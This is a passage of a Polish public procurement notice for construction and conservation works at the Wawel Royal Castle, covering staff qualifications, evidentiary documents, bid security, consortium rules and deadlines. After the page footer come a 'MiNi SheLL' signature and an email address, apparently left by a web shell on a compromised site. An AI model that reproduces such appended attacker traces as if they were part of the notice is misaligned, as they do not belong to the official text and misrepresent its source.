waluty z dnia, w którym nastąpi w postępowaniu publikacja przedmiotowego postępowania. Jeżeli w tym dniu nie będzie opublikowany średni kurs NBP, Zamawiający przyjmie średni kurs z ostatniego dnia przed dniem publikacji.<br/>-	Poprzez należyte wykonanie ww. zamówień, Zamawiający rozumie ich odbiór przez zamawiających bez zastrzeżeń.<br/><br/>2)	dysponuje lub będzie dysponować osobami zdolnymi do wykonania zamówienia, które będą skierowane przez Wykonawcę do realizacji zamówienia tj.:<br/>a)	1 osobą, która będzie pełnić funkcję Kierownika budowy, która będzie kierować robotami budowlanymi: <br/>-	posiadającą uprawnienia budowlane do kierowania robotami bez ograniczeń w specjalności konstrukcyjno-budowlanej wydane na podstawie ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (Dz. U. z 2020 r. poz. 1333 ze zm.), zwaną dalej „PrBud” lub odpowiednie uprawnienia do kierowania robotami budowlanymi w branży konstrukcyjno- budowlanej, wydane na podstawie wcześniej obowiązujących przepisów; <br/>-	została wpisana na listę właściwej okręgowej izby inżynierów budownictwa;<br/>-	spełniającą wymagania określone w art. 37c OchrZabU, w tym przez co najmniej 18 miesięcy brała udział w robotach budowlanych prowadzonych przy zabytkach nieruchomych wpisanych do rejestru zabytków;<br/>-	niezbędne doświadczenie tj. pełniła funkcję kierownika budowy przy robocie budowlanej polegającej na remoncie lub przebudowie lub modernizacji i/lub budowie instalacji w budynku wpisanym do właściwego rejestru obiektów zabytkowych (w rozumieniu przepisów „OchrZabU”, lub – w przypadku rejestrów prowadzonych poza RP – rejestrów równoważnych, prowadzonych na podstawie przepisów obowiązujących ze względu na miejsce położenia zabytku). Wskazana robota budowlana musi być o wartości co najmniej: 2 000 000,00 zł netto, z zastrzeżeniem, że robota musiała zostać zakończona i wykonana bez zastrzeżeń tj. odebrana przez Zamawiającego w okresie ostatnich 7 lat przed terminem składania ofert.<br/>•	Kierownik budowy powinien posiadać uprawnienia budowlane zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (j.t. Dz. U. z 2020 r. poz. 1333 ze zm.) oraz rozporządzeniem Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2019 r. poz. 831) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz uprawnienia do prowadzenia robót w obiekcie zabytkowym zgodnie z § 37c Ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami (t.j. (Dz.U. z 2020 r. poz. 282) dalej OchrZabU. Zgodnie z art. 12a ustawy Prawo budowlane samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1 ustawy mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych. Regulację odrębną stanowią przepisy ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (j.t. Dz. U. z 2020, poz. 220).<br/><br/>b)	1 osobą, która będzie pełnić funkcję Kierownika robót elektrycznych:<br/>-	posiadającą uprawnienia budowlane do kierowania robotami bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych wydane na podstawie PrBud lub odpowiednie uprawnienia do kierowania robotami instalacyjnymi w zakresie instalacji elektrycznych, wydane na podstawie wcześniej obowiązujących przepisów; <br/>-	wpisaną na listę członków właściwej izby samorządu zawodowego;<br/>-	spełniającą wymagania określone w art. 37c „OchrZabU”, w tym przez co najmniej 18 miesięcy brała udział w robotach budowlanych prowadzonych przy zabytkach nieruchomych wpisanych do rejestru zabytków;<br/><br/>c)	1 osobą, która będzie pełnić funkcję Kierownika prac konserwatorskich: <br/>-	posiadającą wykształcenie wyższe (tytuł magistra) w zakresie konserwacji i restauracji dzieł sztuki;<br/>-	posiadającą doświadczenie w kierowaniu pracami konserwatorskimi w ramach realizacji przynajmniej dwóch robót budowlano-konserwatorskich dotyczących konserwacji <br/>elementów kamiennych, konserwacji tynków, konserwacji stolarki w budynkach zabytkowych wpisanych do właściwego rejestru obiektów zabytkowych (w rozumieniu przepisów „OchrZabU”, lub – w przypadku rejestrów prowadzonych poza RP – rejestrów równoważnych, prowadzonych na podstawie przepisów obowiązujących ze względu na miejsce położenia zabytku), o wartości prac konserwatorskich nie mniejszej niż 500 000,00 zł netto każda;<br/>-	spełniającą wymagania określone w art. 37a „OchrZabU”;<br/><br/>d)	co najmniej 2 osobami, które będą odpowiedzialne za instalację systemów okablowania strukturalnego posiadającymi ważne na dzień złożenia oferty imienne dyplomy ukończenia kursu kwalifikacyjnego/szkolenia producenta systemu okablowania (udzielającego 25-letnią gwarancję) w zakresie;<br/>-	instalacji systemów okablowania strukturalnego;<br/>-	wykrywanie i usuwanie usterek w systemach okablowania strukturalnego;<br/><br/>e)	1 osobą która będzie brała udział pracach w branży niskoprądowej – posiadającą: wpis na listę kwalifikowanych pracowników zabezpieczenia technicznego, który uprawnia do wykonywania czynności, o których mowa w art. 3 pkt. 2. ustawy z dn. 22 sierpnia 1997 r. o ochronie osób i mienia (tj. (Dz.U. z 2020 r. poz. 838) tj. zabezpieczenia technicznego, <br/><br/>UWAGA! <br/>	Zamawiający nie dopuszcza łączenia powyżej określonych stanowisk Personelu Wykonawcy, za wyjątkiem stanowiska kierownika robót elektrycznych oraz osoby posiadającej wpis na listę kwalifikowanych pracowników zabezpieczenia technicznego. <br/>	Zamawiający dopuszcza uprawnienia odpowiadające wymaganym, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo budowlane, a także ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2020 r. poz. 220 ze zm.).<br/>	Zamawiający wymaga, aby Kierownik Budowy oraz Kierownik Prac Konserwatorskich byli stale, osobiście obecni na terenie prowadzenia robót budowlanych i prac konserwatorskich podczas ich fizycznej realizacji.<br/>3.	Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, o których mowa w ust. 2, polegać na zdolności technicznej, zawodowej innych podmiotów, niezależnie od charakteru prawnego łączącego go z nim stosunków prawnych, zgodnie z rozdziałem XII SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 Pzp (tj. ust. 1 niniejszego rozdziału) w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, wg wzoru stanowiącego załącznik nr9 do SWZ. <br/>W celu oceny, czy Wykonawca polegając na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w ust. 2, będzie dysponował niezbędnymi zasobami w stopniu umożliwiającym należyte wykonanie zamówienia publicznego oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, a także w celu wykazania braku wobec tych podmiotów podstaw do wykluczenia oraz spełniania, w zakresie w jakim powołuje się na ich zasoby, warunków udziału w postępowaniu, Wykonawca:<br/>1)	składa wraz z ofertą:<br/>a)	zobowiązanie innego podmiotu do udostępnienia niezbędnych zasobów Wykonawcy (wg. wzoru stanowiącego załącznik nr 7 do SWZ) lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie będzie dysponował niezbędnymi zasobami tych podmiotów;<br/>b)	oświadczenie innego podmiotu (wg. wzoru stanowiącego załącznik nr 3 do SWZ) potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu w zakresie, w jakim wykonawca powołuje się na jego zasoby;<br/>2)	w terminie określonym w Rozdziale XI ust. 2 SWZ, przedkłada w odniesieniu do tych podmiotów oświadczenia i dokumenty tam wskazane.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie, o którym mowa w art. 125 ust. 1 Pzp tj. Oświadczenie o braku podstaw wykluczenia i spełnianiu warunków udziału w postępowaniu – wg wzoru stanowiącego załącznik nr 3 do SWZ.<br/>2.	Zamawiający przed wyborem najkorzystniejszej oferty wzywa Wykonawcę, którego oferta została najwyżej oceniona (w przypadku skorzystania z negocjacji, o których mowa w rozdziale XXIV SWZ po ocenie ofert dodatkowych), do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia podmiotowych środków dowodowych, chyba że Zamawiający jest w posiadaniu lub ma dostęp do tych podmiotowych środków dowodowych:<br/>1)	wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 7 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, wg wzoru stanowiącego załącznik nr6 do SWZ;<br/>2)	dowody określające, czy roboty budowlane ujęte w wykazie robót, o którym mowa w pkt. 1) zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty;<br/>3)	wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, wg wzoru stanowiącego załącznik nr8 do SWZ;<br/>4.	Jeżeli zachodzą uzasadnione podstawy do uznania, że złożone uprzednio podmiotowe środki dowodowe nie są już aktualne, Zamawiający może w każdym czasie wezwać Wykonawcę lub Wykonawców do złożenia wszystkich lub niektórych podmiotowych środków dowodowych, aktualnych na dzień ich złożenia.<br/>4.	Jeżeli złożone przez Wykonawców oświadczenie, o którym mowa w ust. 1 niniejszego rozdziału lub podmiotowe środki dowodowe, o których mowa w ust. 2 niniejszego rozdziału budzą wątpliwość Zamawiającego, może on zwrócić się bezpośrednio do podmiotu, który jest w posiadaniu informacji lub dokumentów istotnych w tym zakresie dla oceny spełniania przez Wykonawcę warunków udziału w postępowaniu lub braku podstaw wykluczenia, o przedstawienie takich informacji lub dokumentów.<br/>5.	Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które Zamawiający posiada, jeżeli Wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i aktualność.<br/>1.	Wykonawca może w celu potwierdzenia spełniana warunków udziału polegać na zdolnościach technicznych lub zawodowych podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych. <br/>2.	Wymagania dotyczące polegania na zdolnościach lub sytuacjach innych podmiotów, o których mowa w ust.1:<br/>1)	Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów musi udowodnić Zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia (wg. wzoru stanowiącego załącznik nr 7 do SWZ) lub inny podmiotowy środek dowodowy potwierdzający tą okoliczność;</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia wraz z ofertą przedmiotowych środków dowodowych, z zastrzeżeniem sytuacji, w której Wykonawca za pośrednictwem przedmiotowych środków dowodowych wykazuje równoważność określonych materiałów/urządzeń lub norm, zgodnie z postanowieniami Rozdziału IV SWZ. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Zgodnie z postanowieniami Rozdziału IV pkt.11 SWZ. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo musi być złożone w formie elektronicznej (opatrzone kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym).<br/>2.	W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, którym mowa w art. 125 ust. 1 Pzp (o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu), składa każdy z Wykonawców tworzących Konsorcjum. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3.	Zgodnie z art. 117 ust. 4 Pzp Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wskazują w oświadczeniu stanowiącym załącznik nr 10 do SWZ, które roboty budowlane wykonają poszczególni Wykonawcy.<br/>4.	Oświadczenie, o którym mowa w ust. 3 podlega uzupełnieniu na zasadach określonych w art. 128 ust. 1 Pzp.<br/>5.	Jeżeli Oferta Wykonawców występujących wspólnie zostanie wybrana, Zamawiający będzie żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców. <br/>6.	Zamawiający zgodnie z art. 60 Pzp nie zastrzega obowiązek samodzielnego wykonania przez poszczególnych wykonawców wspólnie ubiegających się o zamówienie kluczowych zadań. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości: 20 000 zł (słownie: dwadzieścia tysięcy złotych 00/100)<br/>2.	Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 Pzp.<br/>3.	Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1)	pieniądzu;<br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach ubezpieczeniowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020r.poz. 299).<br/>4.	Wadium w formie pieniądza należy wnieść przelewem na konto w Banku Gospodarstwa Krajowego nr rachunku48 1130 1150 0012 1269 5620 0006z dopiskiem "Wadium-nr postępowania". <br/>UWAGA: Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego.<br/>5.	Wadium wnoszone w formie poręczeń lub gwarancji musi być złożone jako oryginał gwarancji lub poręczenia w postaci elektronicznej i spełniać co najmniej poniższe wymagania:<br/>1)	musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w Pzp, bez potwierdzania tych okoliczności;<br/>2)	z jej treści powinno jednoznaczne wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium;<br/>3)	powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie;<br/>4)	termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą (z zastrzeżeniem iż pierwszym dniem związania ofertą jest dzień składania ofert);<br/>5)	w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania;<br/>6)	beneficjentem poręczenia lub gwarancji jest: Zamek Królewski na Wawelu - Państwowe Zbiory Sztuki, Wawel 5, 31 - 001 Kraków<br/>7)	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia(art. 58 Pzp), Zamawiający wymaga aby poręczenie lub gwarancja obejmowała swą treścią (tj. zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum);<br/>8)	musi zostać złożone w postaci elektronicznej, opatrzone kwalifikowanym podpisem elektronicznym przez wystawcę poręczenia lub gwarancji;<br/>6.	W przypadku wniesienia wadium w formie:<br/>1) pieniężnej, zaleca się, by dowód dokonania przelewu został dołączony do oferty;<br/>2)	poręczeń lub gwarancji-wymaga się, by oryginał dokumentu został złożony wraz z ofertą.<br/>7.	Oferta wykonawcy, który nie wniesie wadium lub wniesie w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 Pzp. zostanie odrzucona.<br/>8.	Zasady zwrotu oraz okoliczności zatrzymania wadium określa Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> INFORMACJA DLA WYKONAWCÓW WSPÓLNIE UBIEGAJĄCYCH SIĘ O UDZIELENIE ZAMÓWIENIA (SPÓŁKI CYWILNE/ KONSORCJA).<br/>1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo musi być złożone w formie elektronicznej (opatrzone kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym).<br/>2.	W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, którym mowa w art. 125 ust. 1 Pzp (o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu), składa każdy z Wykonawców tworzących Konsorcjum. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3.	Zgodnie z art. 117 ust. 4 Pzp Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wskazują w oświadczeniu stanowiącym załącznik nr 10 do SWZ, które roboty budowlane wykonają poszczególni Wykonawcy.<br/>4.	Oświadczenie, o którym mowa w ust. 3 podlega uzupełnieniu na zasadach określonych w art. 128 ust. 1 Pzp.<br/>5.	Jeżeli Oferta Wykonawców występujących wspólnie zostanie wybrana, Zamawiający będzie żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców. <br/>6.	Zamawiający zgodnie z art. 60 Pzp nie zastrzega obowiązek samodzielnego wykonania przez poszczególnych wykonawców wspólnie ubiegających się o zamówienie kluczowych zadań. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość dokonywania zmian w treści Umowy, w stosunku do treści oferty Wykonawcy. Katalog zmian określa § 29 projektu umowy (załącznik Nr 5 do SWZ). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-12 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://portal.smartpzp.pl/zamekkrolewskinawawelu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-12 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-10</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> Zamawiający działając na podstawie uprawnienia, o którym mowa w art. 288 ust. 1 Pzp zaprosi do negocjacji 3 (trzech) Wykonawców których oferty zostały najwyżej ocenione na podstawie kryteriów, o których mowa w Rozdziale XXIII SWZ, z zastrzeżeniem, że w przypadku jeśli: <br/>-	liczba złożonych ofert, niepodlegających odrzuceniu będzie mniejsza niż 3 (trzy), Zamawiający zaprosi odpowiednio mniejszą liczbę Wykonawców;<br/>-	dwóch (lub więcej) Wykonawców znajduję się na trzecim miejscu w rankingu oceny ofert, ze względu na fakt, że oferty tych Wykonawców przedstawiają taki sam bilans kryteriów, zaprosi odpowiednio większą liczbę.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-25 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com